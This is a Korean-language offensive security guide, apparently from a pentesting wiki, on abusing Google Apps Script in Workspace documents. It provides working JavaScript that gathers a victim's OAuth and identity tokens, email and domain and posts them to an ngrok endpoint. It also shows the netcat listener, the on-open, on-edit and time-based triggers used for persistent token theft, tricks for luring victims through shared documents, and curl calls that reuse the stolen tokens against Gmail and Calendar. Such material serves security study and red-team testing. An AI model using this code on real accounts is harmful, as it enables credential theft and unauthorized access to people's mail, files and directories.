GWS - App Scripts

Reading time: 7 minutes

App Scripts

App Scripts는 편집자 권한이 있는 사용자가 App Script와 연결된 문서에 접근할 때 트리거되는 코드이며, OAuth 프롬프트를 수락한 후 실행됩니다.
또한 App Script의 소유자가 특정 시간마다 실행되도록 설정할 수 있습니다 (Persistence).

App Script 만들기

App Script를 만드는 방법은 여러 가지가 있지만, 가장 일반적인 방법은 **Google 문서(모든 유형)**에서 만들거나 독립형 프로젝트로 만드는 것입니다:

App Script 시나리오

App Script로 Google Sheet 만들기

App Script를 생성하는 것으로 시작합니다. 이 시나리오에 대한 제 추천은 Google Sheet를 만들고 **확장 프로그램 > App Scripts**로 가는 것입니다. 이렇게 하면 시트에 연결된 새로운 App Script가 열립니다.

토큰 유출

OAuth 토큰에 접근을 허용하려면 Services +를 클릭하고 다음과 같은 범위를 추가해야 합니다:

• AdminDirectory: 디렉토리의 사용자 및 그룹에 접근 (사용자가 충분한 권한이 있는 경우)
• Gmail: Gmail 데이터에 접근
• Drive: Drive 데이터에 접근
• Google Sheets API: 트리거와 함께 작동하도록

필요한 범위를 변경하려면 프로젝트 설정으로 가서 **편집기에서 "appsscript.json" 매니페스트 파일 표시**를 활성화할 수 있습니다.

function getToken() {
var userEmail = Session.getActiveUser().getEmail()
var domain = userEmail.substring(userEmail.lastIndexOf("@") + 1)
var oauthToken = ScriptApp.getOAuthToken()
var identityToken = ScriptApp.getIdentityToken()

// Data json
data = {
oauthToken: oauthToken,
identityToken: identityToken,
email: userEmail,
domain: domain,
}

// Send data
makePostRequest(data)

// Use the APIs, if you don't even if the have configured them in appscript.json the App script won't ask for permissions

// To ask for AdminDirectory permissions
var pageToken = ""
page = AdminDirectory.Users.list({
domain: domain, // Use the extracted domain
orderBy: "givenName",
maxResults: 100,
pageToken: pageToken,
})

// To ask for gmail permissions
var threads = GmailApp.getInboxThreads(0, 10)

// To ask for drive permissions
var files = DriveApp.getFiles()
}

function makePostRequest(data) {
var url = "http://5.tcp.eu.ngrok.io:12027"

var options = {
method: "post",
contentType: "application/json",
payload: JSON.stringify(data),
}

try {
UrlFetchApp.fetch(url, options)
} catch (e) {
Logger.log("Error making POST request: " + e.toString())
}
}

요청을 캡처하려면 다음을 실행하면 됩니다:

ngrok tcp 4444
nc -lv 4444 #macOS

앱 스크립트를 실행하기 위해 요청된 권한:

트리거 생성

앱을 읽은 후 ⏰ 트리거를 클릭하여 트리거를 생성합니다. 함수로는 **getToken**을 선택하고, 배포는 **Head**에서 실행되며, 이벤트 소스는 **From spreadsheet**를 선택하고 이벤트 유형은 On open 또는 **On edit**를 선택한 후 저장합니다.

디버깅을 원할 경우 실행 탭에서 앱 스크립트의 실행을 확인할 수 있습니다.

공유

앱 스크립트를 트리거하기 위해 피해자는 편집자 권한으로 연결해야 합니다.

공유된 문서 악용하기

공유 대신 복사하기

문서를 공유하기 위해 링크를 생성하면 다음과 유사한 링크가 생성됩니다: https://docs.google.com/spreadsheets/d/1i5[...]aIUD/edit
종료 부분의 **"/edit"**을 **"/copy"**로 변경하면, 구글은 문서의 복사본을 생성할 것인지 묻습니다:

사용자가 복사하여 접근하면 문서의 내용과 앱 스크립트가 복사되지만, 트리거는 복사되지 않으므로 아무것도 실행되지 않습니다.

웹 애플리케이션으로 공유하기

앱 스크립트를 웹 애플리케이션으로 공유하는 것도 가능합니다(앱 스크립트의 편집기에서 웹 애플리케이션으로 배포), 하지만 다음과 같은 경고가 나타납니다:

필요한 권한을 요청하는 전형적인 OAuth 프롬프트가 뒤따릅니다.

테스트

수집된 토큰을 사용하여 이메일 목록을 나열할 수 있습니다:

curl -X GET "https://www.googleapis.com/gmail/v1/users/<user@email>/messages" \
-H "Authorization: Bearer <token>"

사용자의 캘린더 목록:

curl -H "Authorization: Bearer $OAUTH_TOKEN" \
-H "Accept: application/json" \
"https://www.googleapis.com/calendar/v3/users/me/calendarList"

App Script as Persistence

지속성을 위한 한 가지 옵션은 문서를 생성하고 getToken 함수에 대한 트리거를 추가한 다음 공격자와 문서를 공유하여 공격자가 파일을 열 때마다 희생자의 토큰을 유출하는 것입니다.

또한 App Script를 생성하고 X 시간마다(예: 매분, 매시간, 매일) 트리거하도록 설정할 수 있습니다. 자격 증명이나 희생자의 세션이 손상된 공격자는 App Script 시간 트리거를 설정하고 매일 매우 특권이 있는 OAuth 토큰을 유출할 수 있습니다:

App Script를 생성하고, 트리거로 이동한 다음, 트리거 추가를 클릭하고 이벤트 소스로 시간 기반을 선택하고 자신에게 가장 적합한 옵션을 선택하세요:

Shared Document Unverified Prompt Bypass

게다가, 누군가 편집자 액세스가 있는 문서를 공유했다면, 문서 내에서 App Scripts를 생성할 수 있으며, **문서의 소유자(생성자)**가 App Script의 소유자가 됩니다.